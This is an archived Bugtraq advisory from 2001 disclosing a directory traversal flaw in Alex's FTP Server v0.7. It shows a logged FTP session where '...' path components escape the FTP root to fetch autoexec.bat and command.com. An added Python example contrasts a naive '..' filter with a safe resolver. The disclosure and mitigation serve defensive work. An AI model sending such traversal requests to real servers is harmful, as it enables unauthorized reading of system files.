[20510] in bugtraq
Vulnerabilities in Alex's FTP Server
daemon@ATHENA.MIT.EDU (joetesta@HUSHMAIL.COM)
Mon Apr 30 03:14:35 2001
Date: Sat, 28 Apr 2001 15:52:34 -0800
Reply-To: joetesta@HUSHMAIL.COM
From: joetesta@HUSHMAIL.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Vulnerabilities in Alex's FTP Server
Overview
Alex's FTP Server v0.7 is an FTP server available from http://www.alex.feedback.net.
Vulnerabilities exist which allow a user to break out of the FTP root by requesting paths that contain the component '...'.
Details
The following session illustrates the problem. The FTP root was
'c:\directory\directory':
Connected to xxxxxxxxxx.rh.rit.edu.
220 xxxxxxxxxx FTP version 0.7 ready at Fri Apr 20 23:17:32 2001
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Enter PASS command
Password:
230 Logged in
ftp> get /.../autoexec.bat
200 Port command okay
150 Opening data connection for retr "/.../autoexec.bat"
226 Transfer complete
ftp: 411 bytes received in 0.00Seconds 411000.00Kbytes/sec.
ftp> cd ...
257 "/.../" is current directory
ftp> get command.com
200 Port command okay
150 Opening data connection for retr "/.../command.com"
226 Transfer complete
ftp: 85 bytes received in 0.00Seconds 85000.00Kbytes/sec.
ftp>
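The session above works because '...' is accepted as a path component and passed through to the filesystem; judging by the files retrieved afterwards (autoexec.bat and command.com), it behaves as a double parent step and lands in the drive root above c:\directory\directory. The following Python is an added example, not code from the advisory or from Alex's FTP Server. It contrasts a weak check that refuses only the literal '..' component with a resolver that walks a virtual directory stack against the FTP root and refuses any all-dots component outright, so nothing ambiguous ever reaches the operating system. The root value and the sample requests are taken from the illustration above; the helper names are this example's own.

```python
"""Resolve FTP client paths against a fixed FTP root without traversal.

Pure string handling: it runs on any platform and never touches the
filesystem.  Added example; not code from Alex's FTP Server.
"""

import re

# Constructed sample root, matching the advisory's illustration.
FTP_ROOT = r"c:\directory\directory"

# A component made only of dots, other than '.' and '..', is ambiguous:
# the advisory's session shows '...' acting as a double parent step.
ALL_DOTS = re.compile(r"^\.{3,}$")


def split_components(client_path: str) -> list[str]:
    """Split a client-supplied path on both '/' and '\\', dropping empty parts."""
    return [part for part in re.split(r"[\\/]+", client_path) if part]


def naive_resolve(root: str, client_path: str) -> str:
    """Representative of the weak check: refuse the literal '..' component
    and hand every other component straight to the operating system."""
    parts = split_components(client_path)
    if ".." in parts:
        raise ValueError("parent reference refused")
    return root + "\\" + "\\".join(parts)


def safe_resolve(root: str, client_path: str) -> str:
    """Resolve the client path against the root using a virtual directory stack.

    '.' is dropped, '..' pops one level and is refused at the root, any other
    all-dots component is refused, and components carrying a ':' (drive or
    device references) are refused.  Whatever survives is joined onto root,
    so the result can never lie above it.
    """
    stack: list[str] = []
    for part in split_components(client_path):
        if part == ".":
            continue
        if part == "..":
            if not stack:
                raise ValueError("traversal above FTP root refused")
            stack.pop()
            continue
        if ALL_DOTS.match(part):
            raise ValueError(f"ambiguous path component refused: {part!r}")
        if ":" in part:
            raise ValueError(f"drive or device reference refused: {part!r}")
        stack.append(part)
    return root if not stack else root + "\\" + "\\".join(stack)


def refuses(resolver, root: str, client_path: str) -> bool:
    """True when the resolver rejects the request instead of producing a path."""
    try:
        resolver(root, client_path)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed requests: the two from the advisory's session plus
    # ordinary ones that a resolver must still accept.
    requests = ["/.../autoexec.bat", ".../command.com", "pub/./../readme.txt", "a\\b/c"]
    for req in requests:
        for name, resolver in (("naive", naive_resolve), ("safe", safe_resolve)):
            verdict = "refused" if refuses(resolver, FTP_ROOT, req) else resolver(FTP_ROOT, req)
            print(f"{name:5} {req!r:24} -> {verdict}")
```

The weak resolver lets '...' through unchanged, which is exactly the condition the session exploits; the stack-based resolver refuses it before any filesystem call. Whitelisting the characters a component may contain would be an equally valid design in place of the two explicit refusals.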
Solution
No quick fix is possible.
Vendor Status
Alex Linde was contacted via <alex.linde@magic4.com> on
Friday, April 20, 2001. No reply was received.
- Joe Testa
e-mail: joetesta@hushmail.com
web page: http://hogs.rit.edu/~joet
AIM: LordSpankatron